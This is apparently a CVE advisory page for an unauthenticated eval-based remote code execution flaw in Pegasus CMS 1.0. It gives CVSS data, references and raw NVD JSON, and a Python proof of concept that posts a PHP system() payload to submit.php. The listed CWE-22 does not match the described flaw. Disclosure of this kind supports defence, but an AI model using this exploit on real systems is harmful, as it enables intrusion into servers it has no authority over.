CVE-2019-25687

Description

Pegasus CMS 1.0 contains a remote code execution vulnerability in the extra_fields.php plugin that allows unauthenticated attackers to execute arbitrary commands by exploiting unsafe eval functionality. Attackers can send POST requests to the submit.php endpoint with malicious PHP code in the action parameter to achieve code execution and obtain an interactive shell.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wisdom:pegasus_cms:1.0:*:*:*:*:*:*:* - VULNERABLE

Pegasus CMS 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_rce(target_url):
    """
    PoC for CVE-2019-25687
    Exploits unsafe eval in submit.php action parameter
    """
    target_endpoint = f"{target_url}/submit.php"
    # Malicious PHP code to execute 'id' command
    payload = "system('id');"
    
    data = {
        "action": payload
    }
    
    try:
        response = requests.post(target_endpoint, data=data, timeout=5)
        if response.status_code == 200:
            print(f"[+] Request sent to {target_endpoint}")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://127.0.0.1"
    exploit_rce(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25687
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25687
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25687/
[4] VulDB https://vuldb.com/cve/CVE-2019-25687
[5] https://www.exploit-db.com/exploits/46542
[6] https://www.vulncheck.com/advisories/pegasus-cms-remote-code-execution-via-extra-fields-php
[7] https://www.wisdom.com.au/web/pegasus-cms

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25687", "sourceIdentifier": "[email protected]", "published": "2026-04-05T21:16:47.490", "lastModified": "2026-04-24T15:42:55.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pegasus CMS 1.0 contains a remote code execution vulnerability in the extra_fields.php plugin that allows unauthenticated attackers to execute arbitrary commands by exploiting unsafe eval functionality. Attackers can send POST requests to the submit.php endpoint with malicious PHP code in the action parameter to achieve code execution and obtain an interactive shell."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wisdom:pegasus_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E9533B8B-6BC4-4888-91EC-B2AA35B11B2F"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46542", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/pegasus-cms-remote-code-execution-via-extra-fields-php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.wisdom.com.au/web/pegasus-cms", "source": "[email protected]", "tags": ["Product"]}]}}